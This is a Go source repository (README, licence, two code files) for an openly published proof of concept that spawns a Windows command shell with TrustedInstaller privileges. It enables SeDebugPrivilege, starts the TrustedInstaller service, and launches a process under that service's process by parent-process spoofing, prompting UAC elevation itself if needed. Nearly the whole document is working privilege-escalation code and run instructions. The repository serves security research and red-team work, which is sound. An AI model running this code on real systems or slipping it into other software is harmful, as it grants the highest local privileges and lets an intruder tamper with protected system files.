├── LICENSE
├── README.md
├── functions.go
├── go.mod
├── go.sum
└── main.go


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 FourCore Labs Private Limited
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # TrustedInstaller
 2 | 
 3 | A simple Proof of Concept in Go to spawn a new shell as TrustedInstaller. Read more about how this PoC works on this [blog about TrustedInstaller](https://fourcore.io/blogs/no-more-access-denied-i-am-trustedinstaller). It is important to note that this should be executed as a user which has SeDebugPrivileges. Upon execution, it will automatically ask for UAC in case it is not executed as as an Administrator.
 4 | 
 5 | ## POC
 6 | 
 7 | 1. Clone the repository
 8 | 
 9 | ```
10 | $ git clone https://github.com/FourCoreLabs/TrustedInstallerPOC.git
11 | ```
12 | 
13 | 2. Ensure you have Go installed. This POC has been tested on Go 1.19.
14 | 3. Either build the binary and execute it
15 | 
16 | ```
17 | $ go build ti
18 | $ ./ti.exe
19 | ```
20 | 
21 | 4. Or run it directly
22 | 
23 | ```
24 | $ go run ti
25 | ```
26 | 
27 | 
28 | This will spawn a new cmd shell with TrustedInstaller privileges which can be confirmed by running the command `whoami /all`
29 | 
30 | ![demo](https://user-images.githubusercontent.com/26490648/219342533-79d0cf34-0bf2-4f63-b805-34fca5aff012.gif)
31 | 
32 | ## API
33 | 
34 | - RunAsTrustedInstaller
35 |   - Use the `RunAsTrustedInstaller` function to pass any executable to be run with TrustedInstaller privileges.
36 | 


--------------------------------------------------------------------------------
/functions.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"os"
  6 | 	"strings"
  7 | 	"syscall"
  8 | 	"unicode/utf16"
  9 | 	"unsafe"
 10 | 
 11 | 	"golang.org/x/sys/windows"
 12 | 	"golang.org/x/sys/windows/svc/mgr"
 13 | )
 14 | 
 15 | func openService(mgrHandle windows.Handle, name string) (*mgr.Service, error) {
 16 | 	n, err := windows.UTF16PtrFromString(name)
 17 | 	if err != nil {
 18 | 		return nil, err
 19 | 	}
 20 | 	h, err := windows.OpenService(mgrHandle, n, windows.SERVICE_QUERY_STATUS|windows.SERVICE_START|windows.SERVICE_STOP|windows.SERVICE_USER_DEFINED_CONTROL)
 21 | 	if err != nil {
 22 | 		return nil, err
 23 | 	}
 24 | 	return &mgr.Service{Name: name, Handle: h}, nil
 25 | }
 26 | 
 27 | func enableSeDebugPrivilege() error {
 28 | 	var t windows.Token
 29 | 	if err := windows.OpenProcessToken(windows.CurrentProcess(), windows.TOKEN_ALL_ACCESS, &t); err != nil {
 30 | 		return err
 31 | 	}
 32 | 
 33 | 	var luid windows.LUID
 34 | 
 35 | 	if err := windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(seDebugPrivilege), &luid); err != nil {
 36 | 		return fmt.Errorf("LookupPrivilegeValueW failed, error: %v", err)
 37 | 	}
 38 | 
 39 | 	ap := windows.Tokenprivileges{
 40 | 		PrivilegeCount: 1,
 41 | 	}
 42 | 
 43 | 	ap.Privileges[0].Luid = luid
 44 | 	ap.Privileges[0].Attributes = windows.SE_PRIVILEGE_ENABLED
 45 | 
 46 | 	if err := windows.AdjustTokenPrivileges(t, false, &ap, 0, nil, nil); err != nil {
 47 | 		return fmt.Errorf("AdjustTokenPrivileges failed, error: %v", err)
 48 | 	}
 49 | 
 50 | 	return nil
 51 | }
 52 | 
 53 | func parseProcessName(exeFile [windows.MAX_PATH]uint16) string {
 54 | 	for i, v := range exeFile {
 55 | 		if v <= 0 {
 56 | 			return string(utf16.Decode(exeFile[:i]))
 57 | 		}
 58 | 	}
 59 | 	return ""
 60 | }
 61 | 
 62 | func getTrustedInstallerPid() (uint32, error) {
 63 | 
 64 | 	snapshot, err := windows.CreateToolhelp32Snapshot(windows.TH32CS_SNAPPROCESS, 0)
 65 | 	if err != nil {
 66 | 		return 0, err
 67 | 	}
 68 | 	defer windows.CloseHandle(snapshot)
 69 | 
 70 | 	var procEntry windows.ProcessEntry32
 71 | 	procEntry.Size = uint32(unsafe.Sizeof(procEntry))
 72 | 
 73 | 	if err := windows.Process32First(snapshot, &procEntry); err != nil {
 74 | 		return 0, err
 75 | 	}
 76 | 
 77 | 	for {
 78 | 		if strings.EqualFold(parseProcessName(procEntry.ExeFile), tiExecutableName) {
 79 | 			return procEntry.ProcessID, nil
 80 | 		} else {
 81 | 			if err = windows.Process32Next(snapshot, &procEntry); err != nil {
 82 | 				if err == windows.ERROR_NO_MORE_FILES {
 83 | 					break
 84 | 				}
 85 | 				return 0, err
 86 | 			}
 87 | 		}
 88 | 	}
 89 | 	return 0, fmt.Errorf("cannot find %v in running process list", tiExecutableName)
 90 | }
 91 | 
 92 | func checkIfAdmin() bool {
 93 | 	f, err := os.Open("\\\\.\\PHYSICALDRIVE0")
 94 | 	if err != nil {
 95 | 		return false
 96 | 	}
 97 | 	f.Close()
 98 | 	return true
 99 | }
100 | 
101 | func elevate() error {
102 | 	verb := "runas"
103 | 	exe, _ := os.Executable()
104 | 	cwd, _ := os.Getwd()
105 | 	args := strings.Join(os.Args[1:], " ")
106 | 
107 | 	verbPtr, _ := syscall.UTF16PtrFromString(verb)
108 | 	exePtr, _ := syscall.UTF16PtrFromString(exe)
109 | 	cwdPtr, _ := syscall.UTF16PtrFromString(cwd)
110 | 	argPtr, _ := syscall.UTF16PtrFromString(args)
111 | 
112 | 	var showCmd int32 = 1 //SW_NORMAL
113 | 
114 | 	if err := windows.ShellExecute(0, verbPtr, exePtr, argPtr, cwdPtr, showCmd); err != nil {
115 | 		return err
116 | 	}
117 | 
118 | 	os.Exit(0)
119 | 	return nil
120 | }
121 | 


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module ti
2 | 
3 | go 1.20
4 | 
5 | require golang.org/x/sys v0.5.0
6 | 


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | golang.org/x/sys v0.5.0 h1:MUK/U/4lj1t1oPg0HfuXDN/Z1wv31ZJ/YcPiGccS4DU=
2 | golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
3 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"os/exec"
 6 | 	"syscall"
 7 | 
 8 | 	"golang.org/x/sys/windows/svc"
 9 | 	"golang.org/x/sys/windows/svc/mgr"
10 | 
11 | 	"golang.org/x/sys/windows"
12 | )
13 | 
14 | const (
15 | 	seDebugPrivilege = "SeDebugPrivilege"
16 | 	tiServiceName    = "TrustedInstaller"
17 | 	tiExecutableName = "trustedinstaller.exe"
18 | )
19 | 
20 | func RunAsTrustedInstaller(path string, args []string) error {
21 | 	if !checkIfAdmin() {
22 | 		if err := elevate(); err != nil {
23 | 			return fmt.Errorf("cannot elevate Privs: %v", err)
24 | 		}
25 | 	}
26 | 
27 | 	if err := enableSeDebugPrivilege(); err != nil {
28 | 		return fmt.Errorf("cannot enable %v: %v", seDebugPrivilege, err)
29 | 	}
30 | 
31 | 	svcMgr, err := mgr.Connect()
32 | 	if err != nil {
33 | 		return fmt.Errorf("cannot connect to svc manager: %v", err)
34 | 	}
35 | 
36 | 	s, err := openService(svcMgr.Handle, tiServiceName)
37 | 	if err != nil {
38 | 		return fmt.Errorf("cannot open ti service: %v", err)
39 | 	}
40 | 
41 | 	status, err := s.Query()
42 | 	if err != nil {
43 | 		return fmt.Errorf("cannot query ti service: %v", err)
44 | 	}
45 | 
46 | 	if status.State != svc.Running {
47 | 		if err := s.Start(); err != nil {
48 | 			return fmt.Errorf("cannot start ti service: %v", err)
49 | 		} else {
50 | 			defer s.Control(svc.Stop)
51 | 		}
52 | 	}
53 | 
54 | 	tiPid, err := getTrustedInstallerPid()
55 | 	if err != nil {
56 | 		return err
57 | 	}
58 | 
59 | 	hand, err := windows.OpenProcess(windows.PROCESS_CREATE_PROCESS|windows.PROCESS_DUP_HANDLE|windows.PROCESS_SET_INFORMATION, true, tiPid)
60 | 	if err != nil {
61 | 		return fmt.Errorf("cannot open ti process: %v", err)
62 | 	}
63 | 
64 | 	cmd := exec.Command(path, args...)
65 | 	cmd.SysProcAttr = &syscall.SysProcAttr{
66 | 		CreationFlags: windows.CREATE_NEW_CONSOLE,
67 | 		ParentProcess: syscall.Handle(hand),
68 | 	}
69 | 
70 | 	err = cmd.Start()
71 | 	if err != nil {
72 | 		return fmt.Errorf("cannot start new process: %v", err)
73 | 	}
74 | 
75 | 	fmt.Println("Started process with PID", cmd.Process.Pid)
76 | 	return nil
77 | }
78 | 
79 | func main() {
80 | 	if err := RunAsTrustedInstaller("cmd.exe", []string{"/c", "start", "cmd.exe"}); err != nil {
81 | 		panic(err)
82 | 	}
83 | }
84 | 


--------------------------------------------------------------------------------